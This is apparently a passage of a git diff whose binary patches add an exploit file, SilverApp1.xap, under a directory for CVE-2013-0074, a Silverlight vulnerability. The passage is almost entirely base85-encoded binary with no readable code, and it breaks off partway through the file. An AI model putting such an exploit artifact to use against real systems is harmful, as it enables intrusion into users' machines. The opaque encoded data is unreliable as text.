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
F{y#fm67K*2

literal 0
HcmV?d00001

diff --git a/data/exploits/cve-2013-0074/SilverApp1.xap b/data/exploits/cve-2013-0074/SilverApp1.xap
new file mode 100755
index 0000000000000000000000000000000000000000..10bf6281a103b18da25ef299c19f3a7ee0db2d45
GIT binary patch
literal 8380
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
